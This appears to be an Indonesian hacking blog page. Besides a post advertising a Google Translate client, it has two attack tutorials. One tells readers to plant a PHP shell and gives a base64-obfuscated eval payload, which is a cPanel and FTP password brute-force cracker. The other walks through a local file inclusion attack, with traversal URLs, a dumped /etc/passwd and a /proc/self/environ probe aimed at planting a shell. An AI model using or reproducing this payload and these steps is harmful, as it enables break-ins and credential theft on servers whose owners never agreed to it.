bp-7 BloG: November 2010

google transtool portable

Berapa kali anda membuka Google Translate  dalam sehari? berapa banyak waktu yang terbuang hanya untuk memilih  bahasa dan melakukan copy paste teks. Tentu saja cara manual ini sangat  membosankan,  dan memang cara konvesional ini sebaiknya anda tinggalkan  saja karena sekarang sudah tersedia cara yang lebih mudah yaitu dengan  bantuan tools dari Google Translate Client v3.1 
  
Aplikasi Translate Client  sederhanan namun fungsional ini  benar-benar memberikan kemudahan yang nyata. Kita tidak lagi harus  melakukan cara manual copy paste karena sudah disediakan fasilitas auto paste dengan ditandai G-icon  setiap kali anda melakukan blocking pada text. Untuk dukungan bahasa  sendiri jangan khawatir, karena sama seperti pada situs resmi google  translate layanan ini juga support lebih dari 40 bahasa. Tentu saja  untuk menggunakan aplikasi ini anda harus tetap pada status online. 

download disini

menyingkap CPANEL

hacking, tipstrick, tutorial No Comments »

asumsinya harus nanem shell terlebih dahulu. copas code dibawah ini. dan namai file nya terserah kamu. yang penting ekstensinya *.php.

eval(base64_decode('aWYoJGF1dGggPT0gMSkgew0KaWYgKCFpc3NldCgkX1NFUlZFUlsnUEhQX0FVVEhfVVNFUiddKSB8fCBtZDUoJF9TRVJWRVJbJ1BIUF9BVVRIX1VTRVInXSkhPT0kbmFtZSB8fCBtZDUoJF9TRVJWRVJbJ1BIUF9BVVRIX1BXJ10pIT09JHBhc3MpDQogICB7DQogICBoZWFkZXIoJ1dXVy1BdXRoZW50aWNhdGU6IEJhc2ljIHJlYWxtPSIwZGF5LmNvbSInKTsNCiAgIGhlYWRlcignSFRUUC8xLjAgNDAxIFVuYXV0aG9yaXplZCcpOw0KICAgZXhpdCgiPGI+V3JvbmcgdXNlciBvciBwYXNzICEhPC9iPiIpOw0KICAgfQ0KfQ0KDQokY29ubmVjdF90aW1lb3V0PTU7DQpzZXRfdGltZV9saW1pdCgwKTsNCiRzdWJtaXQ9JF9SRVFVRVNUWydzdWJtaXQnXTsNCiR1c2Vycz0kX1JFUVVFU1RbJ3VzZXJzJ107DQokcGFzcz0kX1JFUVVFU1RbJ3Bhc3N3b3JkcyddOw0KJHRhcmdldD0kX1JFUVVFU1RbJ3RhcmdldCddOw0KJGNyYWNrdHlwZT0kX1JFUVVFU1RbJ2NyYWNrdHlwZSddOw0KDQoNCmlmKCR0YXJnZXQgPT0gIiIpew0KJHRhcmdldCA9ICJsb2NhbGhvc3QiOw0KfQ0KDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIj4NCjwvaGVhZD4NCjx0aXRsZT5DcGFuZWwgKyBGVFAgQ3JhY2tlcjwvdGl0bGU+DQo8Ym9keSB0ZXh0PSIjMDBGRjAwIiBiZ2NvbG9yPSIjMDAwMDAwIiB2bGluaz0iIzAwODAwMCIgbGluaz0iIzAwODAwMCIgYWxpbms9IiMwMDgwMDAiPg0KPGRpdiBhbGlnbj0iY2VudGVyIj4NCjxmb3JtIG1ldGhvZD0iUE9TVCIgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICMwMDAwMDAiPg0KPHRhYmxlIHdpZHRoPSI2NyUiIHN0eWxlPSJib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCI+DQo8dHI+PHRkIGFsaWduPWNlbnRlcj4NCiA8Zm9udCBmYWNlPSJDb3VyaWVyIE5ldyIgc2l6ZT00IGNvbG9yPXllbGxvdz5DcGFuZWwgKyBGVFAgQ3JhY2tlcjwvZm9udD4NCjwvdGQ+PC90cj4NCjwvdGFibGU+DQo8YnIgLz4NCjw/cGhwDQpmdW5jdGlvbiBmdHBfY2hlY2soJGhvc3QsJHVzZXIsJHBhc3MsJHRpbWVvdXQpew0KJGNoID0gY3VybF9pbml0KCk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAiZnRwOi8vJGhvc3QiKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSFRUUEFVVEgsIENVUkxBVVRIX0JBU0lDKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GVFBMSVNUT05MWSwgMSk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUlBXRCwgIiR1c2VyOiRwYXNzIik7DQpjdXJsX3NldG9wdCAoJGNoLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAkdGltZW91dCk7DQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRkFJTE9ORVJST1IsIDEpOw0KJGRhdGEgPSBjdXJsX2V4ZWMoJGNoKTsNCmlmICggY3VybF9lcnJubygkY2gpID09IDI4ICkgeyBwcmludCAiPGI+PGZvbnQgZmFjZT1cIlZlcmRhbmFcIiBzdHlsZT1cImZvbnQtc2l6ZTogOXB0XCI+DQo8Zm9udCBjb2xvcj1cIiNBQTAwMDBcIj5FcnJvciA6PC9mb250PiA8Zm9udCBjb2xvcj1cIiMwMDgwMDBcIj5Db25uZWN0aW9uIFRpbWVvdXQNClBsZWFzZSBDaGVjayBUaGUgVGFyZ2V0IEhvc3RuYW1lIC48L2ZvbnQ+PC9mb250PjwvYj48L3A+IjtleGl0O30NCmVsc2VpZiAoIGN1cmxfZXJybm8oJGNoKSA9PSAwICl7DQpwcmludCAiPHRhYmxlIHdpZHRoPSc2NyUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+PHRyPjx0ZCBhbGlnbj1jZW50ZXI+PGI+PGZvbnQgZmFjZT1cIlRhaG9tYVwiIGNvbG9yPVwiI0ZGMDAwMFwiPlsrXTwvZm9udD48Zm9udD4NCkNyYWNraW5nIFN1Y2Nlc3MgV2l0aCBVc2VybmFtZSAoPC9mb250Pjxmb250IGNvbG9yPVwiI0ZGMDAwMFwiPiR1c2VyPC9mb250Pjxmb250PikgYW5kIFBhc3N3b3JkICg8L2ZvbnQ+PGZvbnQgY29sb3I9XCIjRkYwMDAwXCI+JHBhc3M8L2ZvbnQ+PGZvbnQgY29sb3I9XCIjMDA4MDAwXCI+KTwvZm9udD48L2I+PC90ZD48L3RyPjwvdGFibGU+Ijt9Y3VybF9jbG9zZSgkY2gpO30NCmZ1bmN0aW9uIGNwYW5lbF9jaGVjaygkaG9zdCwkdXNlciwkcGFzcywkdGltZW91dCl7DQokY2ggPSBjdXJsX2luaXQoKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICJodHRwOi8vJGhvc3Q6MjA4MiIpOw0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IVFRQQVVUSCwgQ1VSTEFVVEhfQkFTSUMpOw0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VTRVJQV0QsICIkdXNlcjokcGFzcyIpOw0KY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgJHRpbWVvdXQpOw0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0ZBSUxPTkVSUk9SLCAxKTsNCiRkYXRhID0gY3VybF9leGVjKCRjaCk7DQppZiAoIGN1cmxfZXJybm8oJGNoKSA9PSAyOCApIHsgcHJpbnQgIjxiPjxmb250IGZhY2U9XCJWZXJkYW5hXCIgc3R5bGU9XCJmb250LXNpemU6IDlwdFwiPg0KPGZvbnQgY29sb3I9XCIjQUEwMDAwXCI+RXJyb3IgOjwvZm9udD4gPGZvbnQgY29sb3I9XCIjMDA4MDAwXCI+Q29ubmVjdGlvbiBUaW1lb3V0DQpQbGVhc2UgQ2hlY2sgVGhlIFRhcmdldCBIb3N0bmFtZSAuPC9mb250PjwvZm9udD48L2I+PC9wPiI7ZXhpdDt9DQplbHNlaWYgKCBjdXJsX2Vycm5vKCRjaCkgPT0gMCApew0KcHJpbnQgIjx0YWJsZSB3aWR0aD0nNjclJyBzdHlsZT0nYm9yZGVyOiAycHggZGFzaGVkICMxRDFEMUQ7IGJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7IGNvbG9yOiNDMEMwQzAnPjx0cj48dGQgYWxpZ249Y2VudGVyPjxiPjxmb250IGZhY2U9XCJUYWhvbWFcIiBjb2xvcj1cIiNGRjAwMDBcIj5bK108L2ZvbnQ+PGZvbnQ+DQpDcmFja2luZyBTdWNjZXNzIFdpdGggVXNlcm5hbWUgKDwvZm9udD48Zm9udCBjb2xvcj1cIiNGRjAwMDBcIj4kdXNlcjwvZm9udD48Zm9udD4pIGFuZCBQYXNzd29yZCAoPC9mb250Pjxmb250IGNvbG9yPVwiI0ZGMDAwMFwiPiRwYXNzPC9mb250Pjxmb250IGNvbG9yPVwiIzAwODAwMFwiPik8L2ZvbnQ+PC9iPjwvdGQ+PC90cj48L3RhYmxlPiI7fWN1cmxfY2xvc2UoJGNoKTt9DQppZihpc3NldCgkc3VibWl0KSAmJiAhZW1wdHkoJHN1Ym1pdCkpew0KaWYoZW1wdHkoJHVzZXJzKSAmJiBlbXB0eSgkcGFzcykpeyBwcmludCAiPHA+PGZvbnQgZmFjZT1cIlRhaG9tYVwiIHNpemU9XCIyXCI+PGI+PGZvbnQgY29sb3I9XCIjRkYwMDAwXCI+RXJyb3IgOiA8L2ZvbnQ+UGxlYXNlIENoZWNrIFRoZSBVc2VycyBvciBQYXNzd29yZCBMaXN0IEVudHJ5IC4gLiAuPC9iPjwvZm9udD48L3A+IjsgZXhpdDsgfQ0KaWYoZW1wdHkoJHVzZXJzKSl7IHByaW50ICI8cD48Zm9udCBmYWNlPSdUYWhvbWEnIHNpemU9JzInPjxiPjxmb250IGNvbG9yPScjRkYwMDAwJz5FcnJvciA6IDwvZm9udD5QbGVhc2UgQ2hlY2sgVGhlIFVzZXJzIExpc3QgRW50cnkgLiAuIC48L2I+PC9mb250PjwvcD4iOyBleGl0OyB9DQppZihlbXB0eSgkcGFzcykgKXsgcHJpbnQgIjxwPjxmb250IGZhY2U9J1RhaG9tYScgc2l6ZT0nMic+PGI+PGZvbnQgY29sb3I9JyNGRjAwMDAnPkVycm9yIDogPC9mb250PlBsZWFzZSBDaGVjayBUaGUgUGFzc3dvcmQgTGlzdCBFbnRyeSAuIC4gLjwvYj48L2ZvbnQ+PC9wPiI7IGV4aXQ7IH07DQokdXNlcmxpc3Q9ZXhwbG9kZSgiXG4iLCR1c2Vycyk7DQokcGFzc2xpc3Q9ZXhwbG9kZSgiXG4iLCRwYXNzKTsNCnByaW50ICI8Yj48Zm9udCBmYWNlPVwiVGFob21hXCIgc3R5bGU9XCJmb250LXNpemU6IDlwdFwiIGNvbG9yPVwiIzAwODAwMFwiPlt+XSM8L2ZvbnQ+PGZvbnQgZmFjZT1cIlRhaG9tYVwiIHN0eWxlPVwiZm9udC1zaXplOiA5cHRcIiBjb2xvcj1cIiNGRjAwMDBcIj4NCkNyYWNraW5nIFByb2Nlc3MgU3RhcnRlZCwgUGxlYXNlIFdhaXQgLi4uPC9mb250PjwvYj48YnI+PGJyPiI7DQpmb3JlYWNoICgkdXNlcmxpc3QgYXMgJHVzZXIpIHsNCiRwdXJldXNlciA9IHRyaW0oJHVzZXIpOw0KZm9yZWFjaCAoJHBhc3NsaXN0IGFzICRwYXNzd29yZCApIHsNCiRwdXJlcGFzcyA9IHRyaW0oJHBhc3N3b3JkKTsNCmlmKCRjcmFja3R5cGUgPT0gImZ0cCIpew0KZnRwX2NoZWNrKCR0YXJnZXQsJHB1cmV1c2VyLCRwdXJlcGFzcywkY29ubmVjdF90aW1lb3V0KTsNCn0NCmlmICgkY3JhY2t0eXBlID09ICJjcGFuZWwiKQ0Kew0KY3BhbmVsX2NoZWNrKCR0YXJnZXQsJHB1cmV1c2VyLCRwdXJlcGFzcywkY29ubmVjdF90aW1lb3V0KTsNCn0NCn0NCn0NCn0NCj8+PD8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmKCRfUE9TVFsnZW50ZXInXSl7DQplY2hvICI8Zm9ybSBtZXRob2Q9UE9TVCBhY3Rpb249Jyc+PHRhYmxlIHdpZHRoPSc2NyUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+DQogICAgICAgICAgICAgICAgPHRyPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRkPiA8YnIgLz4NCiAgICAgICAgPHAgYWxpZ249J2NlbnRlcic+PGI+PGZvbnQgY29sb3I9JyNGRjAwMDAnPg0KICAgICAgICAgICAgICAgIDxzcGFuIGxhbmc9J2VuLXVzJz5TZXJ2ZXIncyBJUDwvc3Bhbj4gOjwvZm9udD48Zm9udCBmYWNlPSdBcmlhbCc+DQogICAgICAgIDwvZm9udD48Zm9udCBmYWNlPSdBcmlhbCcgY29sb3I9JyNDQzAwMDAnPg0KICAgICAgICA8aW5wdXQgdHlwZT0ndGV4dCcgbmFtZT0ndGFyZ2V0JyBzaXplPScxNicgdmFsdWU9JHRhcmdldCBzdHlsZT0nYm9yZGVyOiAycHggZGFzaGVkICMxRDFEMUQ7IGJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7IGNvbG9yOiNDMEMwQzAnPjwvZm9udD48L2I+PC9wPg0KICAgICAgICA8cCBhbGlnbj0nY2VudGVyJz48Yj48Zm9udCBjb2xvcj0nIzAwODAwMCcgZmFjZT0nVGFob21hJyBzaXplPScyJz4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgPC9mb250PjwvYj48L3A+DQogICAgICAgICAgICAgICAgICAgICAgICA8ZGl2IGFsaWduPSdjZW50ZXInPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9JzU1JScgc3R5bGU9J2JvcmRlcjogMnB4IGRhc2hlZCAjMUQxRDFEOyBiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOyBjb2xvcjojQzBDMEMwJz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQgYWxpZ249J2NlbnRlcic+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8c3BhbiBsYW5nPSdlbi11cyc+PGZvbnQgY29sb3I9JyNGRjAwMDAnPjxiPlVzZXJuYW1lPC9iPjwvZm9udD48L3NwYW4+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwIGFsaWduPSdjZW50ZXInPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHNwYW4gbGFuZz0nZW4tdXMnPjxmb250IGNvbG9yPScjRkYwMDAwJz48Yj5QYXNzd29yZDwvYj48L2ZvbnQ+PC9zcGFuPjwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90YWJsZT4NCg0KICAgICAgICAgICAgICAgICAgICAgICAgPHAgYWxpZ249J2NlbnRlcic+Jm5ic3A7PHRleHRhcmVhIHJvd3M9JzIwJyBuYW1lPSd1c2VycycgY29scz0nMjUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+IjsNCg0KICAgICAgc3lzdGVtKCdscyAvdmFyL21haWwnKTsNCg0KZWNobyAiPC90ZXh0YXJlYT48dGV4dGFyZWEgcm93cz0nMjAnIG5hbWU9J3Bhc3N3b3JkcycgY29scz0nMjUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+MTIzMTIzXG4xMjM0NTZcbjEyMzQ1NjdcbjEyMzQ1Njc4XG4xMjM0NTY3ODlcbjE1OTE1OVxuMTEyMjMzXG4zMzIyMTFcbjE0Nzg5NjNcbjE0Nzg5NjMuXG5jcGFuZWxcbnBhc3N3b3JkXG51c2VyXG5wYXNzd2RcbnBhc3N3b3Jkc1xuMTU5MzU3XG4zNTc5NTFcbjExNDQ3N1xucGFzc1xuUGFzc3dvcmQ8L3RleHRhcmVhPjxicj4NCiAgICAgICAgPGJyPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxiPiA8Zm9udCBmb250IGNvbG9yPScjRkYwMDAwJz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd1ZXNzIG9wdGlvbnM8L2ZvbnQ+PC9iPjxmb250IHN0eWxlPSdmb250LXNpemU6IDEycHQ7JyBzaXplPSctMycgZmFjZT0nVmVyZGFuYSc+PHNwYW4gc3R5bGU9J2ZvbnQtc2l6ZTogOXB0Oyc+Jm5ic3A7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8Zm9udCBmYWNlPSdUYWhvbWEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGlucHV0IG5hbWU9J2NyYWNrdHlwZScgdmFsdWU9J2NwYW5lbCcgc3R5bGU9J2ZvbnQtd2VpZ2h0OiA3MDA7JyBjaGVja2VkIHR5cGU9J3JhZGlvJz48L2ZvbnQ+PC9zcGFuPjwvZm9udD48Yj48Zm9udCBzaXplPScyJyBmYWNlPSdUYWhvbWEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ3BhbmVsPC9mb250Pjxmb250IHNpemU9JzInIGNvbG9yPScjY2MwMDAwJyBmYWNlPSdUYWhvbWEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9mb250Pjxmb250IHNpemU9JzInIGNvbG9yPScjRkZGRkZGJyBmYWNlPSdUYWhvbWEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKDIwODIpPC9mb250PjwvYj48Zm9udCBzaXplPScyJyBmYWNlPSdUYWhvbWEnPjxiPiA8L2I+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L2ZvbnQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8Zm9udCBzdHlsZT0nZm9udC1zaXplOiAxMnB0Oycgc2l6ZT0nLTMnIGZhY2U9J1ZlcmRhbmEnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHNwYW4gc3R5bGU9J2ZvbnQtc2l6ZTogOXB0Oyc+PGZvbnQgZmFjZT0nVGFob21hJz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBuYW1lPSdjcmFja3R5cGUnIHZhbHVlPSdmdHAnIHN0eWxlPSdmb250LXdlaWdodDogNzAwOycgdHlwZT0ncmFkaW8nPjwvZm9udD48L3NwYW4+PC9mb250Pjxmb250IHN0eWxlPSdmb250LXdlaWdodDogNzAwOycgc2l6ZT0nMicgZmFjZT0nVGFob21hJz4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvZm9udD48c3BhbiBzdHlsZT0nZm9udC13ZWlnaHQ6IDcwMDsnPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGZvbnQgc2l6ZT0nMicgZmFjZT0nVGFob21hJz5GdHAgPC9mb250Pg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPGZvbnQgc2l6ZT0nMicgY29sb3I9JyNGRkZGRkYnIGZhY2U9J1RhaG9tYSc+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAoMjEpPC9mb250Pjwvc3Bhbj48L3A+DQogICAgICAgIDxwIGFsaWduPSdjZW50ZXInPjxvcHRpb24gdmFsdWU9J25hbWUnPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOw0KICAgICAgICA8aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0nICAgQ3JhY2sgaXQgISAgICcgbmFtZT0nc3VibWl0JyBzdHlsZT0nY29sb3I6ICNGRjAwMDA7IGZvbnQtd2VpZ2h0OiBib2xkOyBib3JkZXI6IDFweCBkYXNoZWQgIzMzMzMzMzsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMCc+PC9wPg0KICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICA8L3RhYmxlPg0KDQogICAgPHAgYWxpZ249J2NlbnRlcic+PC90ZD4NCiAgPC90cj4NCiAgPC9mb3JtPg0KICA8dGFibGUgd2lkdGg9JzY3JScgc3R5bGU9J2JvcmRlcjogMnB4IGRhc2hlZCAjMUQxRDFEOyBiYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOyBjb2xvcjojQzBDMEMwJz4NCjx0cj48dGQgYWxpZ249Y2VudGVyPg0KIDxmb250IGZhY2U9J0NvdXJpZXIgTmV3JyBzaXplPTIgY29sb3I9eWVsbG93PltDb2RlZCBCeSBDcmF6eV9IYWNrZXJdPGJyIC8+Q29weXJpZ2h0IHJlc2VydmVkIHRvIDBkYXkuY29tIChTZWN1cml0eSBMb3YzcnopPC9mb250Pg0KPC90ZD48L3RyPg0KPC90YWJsZT4NCiAgIjtkaWUoKTsNCn0NCj8+DQogPHRhYmxlIHdpZHRoPSc2NyUnIHN0eWxlPSdib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCc+DQo8dHI+PHRkIGFsaWduPWNlbnRlcj48Zm9ybSBtZXRob2Q9UE9TVCBhY3Rpb249JycgYWxpZ249Y2VudGVyPjxiciAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBuYW1lPWVudGVyIHZhbHVlPSIgRW50ZXIgIiBzdHlsZT0nY29sb3I6ICNGRjAwMDA7IGZvbnQtd2VpZ2h0OiBib2xkOyBib3JkZXI6IDFweCBkYXNoZWQgIzMzMzMzMzsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMCcgLz48L2Zvcm0+PC90ZD48L3RyPjwvdGFibGU+PGJyIC8+DQoNCg0KPHRhYmxlIHdpZHRoPSI2NyUiIHN0eWxlPSJib3JkZXI6IDJweCBkYXNoZWQgIzFEMUQxRDsgYmFja2dyb3VuZC1jb2xvcjogIzAwMDAwMDsgY29sb3I6I0MwQzBDMCI+DQo8dHI+PHRkIGFsaWduPWNlbnRlcj4NCiA8Zm9udCBmYWNlPSJDb3VyaWVyIE5ldyIgc2l6ZT0yIGNvbG9yPXllbGxvdz5bQ29kZWQgQnkgQ3JhenlfSGFja2VyXTxiciAvPkNvcHlyaWdodCByZXNlcnZlZCB0byAwZGF5LmNvbSAoU2VjdXJpdHkgTG92M3J6KTwvZm9udD4NCjwvdGQ+PC90cj4NCjwvdGFibGU+'));

?>

lfi

hacking, tutorial No Comments »

Cara menanam shell lewat LFI (Local file disclosure) dengan metode proc/self/environ

dengan tutorial ini saya akan menjelaskan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ.
Ok kita langsung saja…

1. kita menemukan website yang vulnerable terhadap serangan LFI.

contoh : http://site.com/info.php?file=news.php

2. coba kita ganti “news.php” dengan “../../../”.

contoh : http://site.com/info.php?file=..%2F..%2F..%2F

lalu kita mendapat error, seperti berikut…

Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.

contoh : http://site.com/info.php?file=etc%2Fpasswd

Tetapi kita masih mendapat error seperti berikut :

Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99

bagaimana jika kita naikan directorynya ?
mari kita coba…

contoh : http://site.com/info.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false
avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false
saned:x:106:113::/home/saned:/bin/false
pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
messagebus:x:108:117::/var/run/dbus:/bin/false
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false
gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash
snmp:x:112:65534::/var/lib/snmp:/bin/false
guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin

3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”

contoh : http://site.com/info.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron

Jika anda mendapatkan yang seperti ini :

DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15

PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80

Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD

